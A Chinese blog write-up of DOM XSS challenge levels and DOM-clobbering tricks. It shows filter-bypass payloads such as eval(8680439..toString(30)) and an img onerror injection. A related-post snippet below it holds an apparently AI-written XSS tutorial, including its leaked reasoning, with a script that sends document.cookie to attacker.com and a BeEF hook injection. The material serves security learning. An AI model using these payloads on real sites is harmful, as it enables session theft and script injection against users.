XSS DOM漏洞复现 与DOM 破坏

最新推荐文章于 2025-02-19 15:08:51 发布
最新推荐文章于 2025-02-19 15:08:51 发布
阅读量629 收藏 3
点赞数 5
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iteuko/article/details/141278933
版权

目录

DOM关卡部分复现

DOM破环

DOM关卡部分复现

第一关

此关过滤了字母数字,所以只能用编码去解决,去JSFUCK上面把alert(1337)编码,然后再编码成url编码格式  放入即可

第二关

这一关过滤了符号和关键字,关键字还过滤了confirm和prompt

第一种解法 用匿名函数

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

第二种parseint 解析一个字符串并返回指定基数的十进制整数,radic是2-36之间的整数,表示被解析字符串的基数

parseint()先把alert转成用30进制为8680439,然后再用toString转化回来

?mafia=eval(8680439..toString(30))(1337)

第三种  用location.hash.slice(1)#alert(1337)   前面表示取第一个字符

?mafia=eval(location.hash.slice(1))#alert(1337)

DOM破环

箭头指的地方则是前端过滤框架,无法绕过,所以入手点应该在时间函数这里

因为我们可以直接用标签的id和name取出标签

我们现在需要构造一个id为ok的a标签,a 标签有tostring方法,弹窗 会把href里面的内容自动转码当成一个字符串打印出来

setTimeout时间函数是可以把我们想要操作的函数放进字符串去执行的

获取到ok,会自动用tostring方法,获取href属性

但是没有绕过过滤框架,这个javascript在黑名单里面,去白名单找另外的

然后换成cid 即可,成功执行

构造一个DOM破坏  环境

指针的原理,删完一个,指针会后移动,所以删除1,3,5的位置 ,2,4位置保留,那么把payload写到2,4,位置即可

#<img abc=1 src=1 aaa=2 onerror=alert(1)>

但是可以修复这个

绕过:

CSS动画,下面的el删除的是后面的input的内容,已经通过它们占了。在执行动画前会执行alert

Y9186
关注
复现awvs——XSS(反射型)漏洞
记录并分享学习安全的知识点..
12-29 3221
1.首先通过awvs对网站进行扫描如下: 2. 判断为xss反射型漏洞,然后打开目标网站,首先先找到变量ref 3.可以看出被隐藏了,将type值改为text文本框,进行复现
XSS(DOM)
kid的博客
05-05 4239
XSS(DOM) 前言 讲道理,现在我对XSS(DOM)的原理还是很迷啊,不看下js和前端的知识感觉还是很迷,不是很懂。 但是我觉得练习还是可以做的,因为看过一些大佬的文章后,感觉有成为脚本小子的能力了… XSS的原理分析解剖(第二篇) 这篇文章前面xss反射型的时候就引用过,里面有一段介绍xss dom的,我感觉原理说的也不是很清楚,但看了它的例子后大概知道怎么去搞了… 练习 Low 这里G...
实验24:domxss详解及多种场景演示
qq_44720671的博客
04-15 2765
什么是dom? 举个例子来理解一下dom 我们直接进入w3school这个网站来查看dom的实例 我们点开 这边就是一段纯html的代码 我们再把它原有的java script代码放回去 这段代码就是对x进行一个getElementById的赋值,当你点击这个标题的时候,他会把值转给function,然后就会弹出一个这是标题的框 这一整个过程都是在前端进行的,没有后台进行交互,所以...
DOMxss复现(无过滤附源码)
qq_40390383的博客
04-12 2117
<html> <head> <title> DOM-XSS</title> </head> <body> <script> function shuru(){ var oBox=document.get...
xss漏洞如何修复(非常详细),零基础入门到精通,看这一篇就够了_xss漏洞修复
Galaxy_0的博客
02-06 1578
修复XSS漏洞的方法包括:对用户输入进行过滤和转义,使用CSP策略限制外部资源的加载,以及使用HttpOnly属性保护Cookie等。XSS(跨站脚本攻击)漏洞是一种常见的网络安全问题,它允许攻击者在受害者的浏览器中注入恶意脚本,这些脚本可以窃取用户的敏感信息,如登录凭证、信用卡信息等,为了保护网站和用户免受XSS攻击,我们需要采取一些措施来修复这些漏洞,本文将详细介绍如何修复XSS漏洞
复现DOMXSS攻击(1-8关)
m0_68498873的博客
08-18 1114
首先是定义一个表单,ID为“ricardo”,使用GET方法提交数据,然后在表单中添加一个文本输入框,名称为“milos”,默认值为“True”,设置表单的提交地址为当前URL中名为“ricardo”的查询参数的值,如果没有该参数,则默认为“#”,并且在2秒后自动提交表单,提交到指定的URL。过滤框架对获取的内容进行清理,会把你的危险属性过滤完了,最后将结果赋值给ID为“boomer”的元素的内部HTML。总的来说就是从 URL 中获取参数 "jeff",生成一个字符串并在 1 秒后显示在网页上。
XSS复现
nixiaoge的博客
08-18 1356
XSS是一种网络安全漏洞,允许攻击者通过注入恶意脚本到网页中,影响用户。主要类型包括反射型XSSDOMXSS和CSS型XSS。防范措施包括输入验证、转义用户输入和使用HttpOnlyCookie。文章详细解释了各种XSS攻击的原理和防范方法。
xss复现
m0_64238664的博客
08-16 424
首先是传给wey一个值,然后赋值给变量let wey,然后这里过滤了尖括号,最后将我们的变量wey内容传给Uganda,显示在输入框中,Uganda也带一个inner HTML的属性,所以我们不能使用script标签,那就看看其他的思路,由此我们无法闭合标签,我们可以使用onclick函数加入一个点击事件,一点击就可以触发。可是问题又来了,游戏规则上说了我们不能使用用户交互的方式,那有没有在input标签里面不和用户交互也可以触发的方式呢?所以我们可以使用JavaScript来绕过。
XSS漏洞总结和漏洞复现
weixin_45492087的博客
07-28 2558
跨站脚本攻击XSS(CrossSiteScripting),为区别层叠样式表(CascadingStyleSheets,CSS),所以改写为XSS
DVWA——XSS注入复现
qq_62056583的博客
07-13 2001
在对DVWA靶场漏洞复现前,先了解一下XSS漏洞的相关知识攻击者利用它向网页中注入恶意的客户端脚本,使得用户在访问页面时执行这些恶意脚本,从而达到攻击的目的。这种攻击通常利用了网站未对用户输入进行充分过滤或转义的情况。XSS的攻击方式分为三种,分别是:分别为反射型(Reflected),存储型(Stored)和DOM型。:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库):将用户输入的数据存储在服务器端。
pikachu之xss漏洞复现
m0_54024658的博客
05-24 814
xss跨站脚本xss简介xss漏洞类型反射型存储型DOMXSS攻击过程漏洞复现反射型XSS(get)存储型XSSDOMXSS xss简介 XSS(跨站脚本)是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户,XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制。因为对程序中输入和输出的控制不够严格,导致漏洞的形成。 xss漏洞类型 反射型 交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存储型 交互的数据会被存在数据库里面,
XSS-复现dom破坏案例和靶场
山月不问人间事
08-18 1153
首先是传给wey一个值,然后赋值给变量let wey,然后这里过滤了<>尖括号,最后将我们的变量wey内容传给Uganda,显示在输入框中,Uganda也带一个inner HTML的属性,所以我们不能使用script标签,那就看看其他的思路;可以看到括号丢失 ,因为url在传参时,会将我们的特殊符号进行解码,但我们传递的是html的实体编码,所以问题出现在了这里,那么我们再将实体编码再进行次url编码。所以我们这里只能换一种思路,他不能加标签,那我们看能不能直接闭合ma,之后执行我们的代码。
【DVWA系列】十、XSS(DOM) 基于DOM型的XSS(源码分析&漏洞利用)
Pluto.的博客
03-12 1535
文章目录DVWAXSS(DOM) 基于DOM的跨站脚本攻击一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别 DVWA XSS(DOM) 基于DOM的跨站脚本攻击 一、Low 级别 没有任何的安全保护措施 下拉框选择语言提交后,在url栏中的default参数直接显示: 构造XSS代码,修改参数,成功执行脚本: ?default=<script>alert('/xss/')</script> 查看网页源代码,脚本插入到代码中,所以执行了
JAVA Web应用常见漏洞修复建议_基于domxss是将用户可控的javascript数据输出到html页面中而产生的漏洞,为了避
2401_84968693的博客
05-12 1534
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。[外链图片转存中…(img-9DtDKTL0-1715491483638)]
xss漏洞复现
m0_66022305的博客
09-04 427
客户端的脚本程序可以动态地检查和修改页面内容,而不依赖于服务器端的数据。因为这种攻击方式的注入代码是从目标服务器通过错误信息、搜索结果等等方式“反射”回来的:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。XSS的原理是恶意攻击者往 Web 页面里插入恶意可执行网页脚本代码,当用户浏览该页之时,嵌入其中 Web 里面的脚本代码会被执行,从而可以达到攻击者盗取用户信息或其他侵犯用户安全隐私的目的。
防止基于 DOMXSS
热门推荐
Artisan_w
03-05 1万+
防止基于 DOMXSS 规则1 原则:HTML 转义,然后 JavaScript 转义,然后再将不受信任的数据插入到执行上下文中的 HTML 子上下文中 有多种方法和属性可用于在 JavaScript 中直接呈现 HTML 内容。这些方法构成了执行上下文中的 HTML 子上下文。如果这些方法提供了不受信任的输入,则可能会导致 XSS 漏洞 属性 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<
XSS漏洞
路漫漫其修远兮
12-15 801
DOM(Document Object Model)是HTML文档的一种表现形式,它以树状结构组织页面内容。我们插入恶意脚本在DOM树中,当浏览器执行HTML时就会解析我们插入在HTML中的恶意代码造成攻击。它会把攻击者的恶意脚本存储到服务器数据库和文件中,大多数通过留言功能,评论区等功能,当用户访问这个些被写入恶意脚本的评论时就会被造成攻击。允许攻击者在用户的浏览器中执行恶意的脚本。只要是能输入参数的地方都可能产生XSS,比如说评论区,搜索框等。通常通过构造恶意的URL语句,发送给用户造成攻击。
DOMXSS详讲
weixin_59047731的博客
11-21 3440
在网站页面中有许多元素,当页面到达浏览器时,浏览器会为页面创建一个项级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。也就是说,客户端的脚本程序可以通过DOM动态修改页面内容,从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的,所以基于DOM型的XSS漏洞不需要服务器端交互,它只发生在客户端处理数据的阶段。除了富文本的输出之外,在变量输出到HTML页面时,可以使用编码或者转义的方式来防御XSS攻击。
XSS漏洞及其修复方法详解
ttyy1112的专栏
02-19 746
*跨站脚本攻击(Cross-Site Scripting, XSS)**是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本(通常是JavaScript),使得这些脚本在其他用户的浏览器中执行。这种攻击能够盗取用户信息、劫持会话、传播恶意软件或进行钓鱼攻击。
实战XSS漏洞复现
最新发布
04-02
<think>好的,我需要帮助用户了解如何复现XSS漏洞以进行安全测试。首先,我得整理XSS的基本概念,确保用户明白漏洞的原理。根据提供的引用,XSS分为反射型、存储型和DOM型,这点要明确。 接下来,复现步骤需要详细分点。用户可能需要知道如何搭建测试环境,比如使用PHPStudy或者Docker,引用中的例子提到了本地服务器,可以引用相关部分。然后构造测试Payload,引用里提到了<script>alert(1)</script>和更隐蔽的console.log(1),这些例子需要包含进去,并说明不同场景下的应用。 实例分析部分,用户可能想知道具体的漏洞复现过程。比如反射型XSS,根据引用中的URL示例,需要展示如何构造恶意链接,并解释参数如何触发漏洞。存储型XSS则要举例用户输入如何被保存并显示给其他用户,引用中的PHPmyWind案例可以作为例子,但用户提供的引用中没有详细说明,可能需要参考已有的信息。 工具使用方面,BeEF框架在引用中被提到用于获取Cookie,这部分要介绍工具的作用和基本使用方法,帮助用户了解如何利用工具进行深入利用。 防御措施也是重要的一环,用户可能想知道如何预防XSS,引用中提到输入验证、过滤和转义,需要强调这些方法,并建议使用安全的编码函数。 最后,生成相关问题,确保覆盖用户可能进一步提问的方向,比如不同XSS类型的区别、工具推荐、防御方法以及实际漏洞案例。需要检查引用标记是否正确,每个步骤都自然引用对应的来源,避免遗漏。 整个过程要保持语言简洁,步骤清晰,符合用户要求的格式,使用中文,并且正确应用LaTeX格式。同时注意不要使用Markdown,用自然的分段和标号。检查是否有遗漏的引用,确保每个引用标记对应正确的来源,比如复现步骤中的实例分析引用正确的示例链接。</think>### XSS漏洞复现方法及实例分析 #### 一、XSS漏洞基础 XSS(跨站脚本攻击)通过注入恶意脚本代码到网页中,利用用户浏览器执行非法操作。根据攻击方式可分为以下三类: 1. **反射型XSS**:恶意脚本通过URL参数注入,服务器直接返回未过滤的内容[^1]。 2. **存储型XSS**:恶意脚本存储到服务器数据库,其他用户访问时触发[^2]。 3. **DOMXSS**:完全由客户端JavaScript解析漏洞导致,不经过服务器处理[^1]。 --- #### 二、复现步骤实例 ##### 1. 搭建测试环境 - **本地环境**:使用PHPStudy或Docker搭建Web服务器(如引用示例中的`http://localhost:8080`[^3])。 - **目标页面**:选择存在输入输出交互的页面(如留言板、搜索框)。 ##### 2. 构造测试Payload - **基础测试**: ```html <script>alert(1)</script> <!-- 触发弹窗 --> ``` - **隐蔽测试**: ```javascript console.log(1) <!-- 控制台输出,避免弹窗引起注意[^4] --> ``` - **编码绕过**: 使用URL编码或HTML实体编码绕过简单过滤: ```url http://localhost:8080/?%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22 [^3] ``` ##### 3. 实例分析:反射型XSS复现 1. **目标URL**:假设存在搜索功能页面`search.php?keyword=test`。 2. **注入Payload**: ```url http://localhost:8080/search.php?keyword=<script>alert(document.cookie)</script> ``` 3. **触发漏洞**:服务器未过滤参数直接返回页面,脚本执行并泄露Cookie[^5]。 ##### 4. 存储型XSS复现(以留言板为例) 1. **提交恶意内容**: ```html <script>fetch('http://attacker.com/steal?data=' + document.cookie)</script> ``` 2. **持久化存储**:恶意脚本保存到数据库。 3. **其他用户访问**:加载留言时自动发送Cookie到攻击者服务器[^2]。 ##### 5. 工具辅助利用 - **BeEF框架**:用于控制受害者浏览器,执行高级攻击(如截图、键盘记录): ```bash # Kali中启动BeEF beef-xss ``` 注入Payload: ```html <script src="http://<beef_server>:3000/hook.js"></script> ``` --- #### 三、防御措施 1. **输入过滤**:过滤`<script>`、`onerror`等危险标签/属性。 2. **输出转义**:使用HTML实体编码(如`<`转为`<`)[^2]。 3. **CSP策略**:通过HTTP头限制脚本来源。 4. **安全函数**:PHP中可用`htmlspecialchars()`,JavaScript中避免`innerHTML`。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值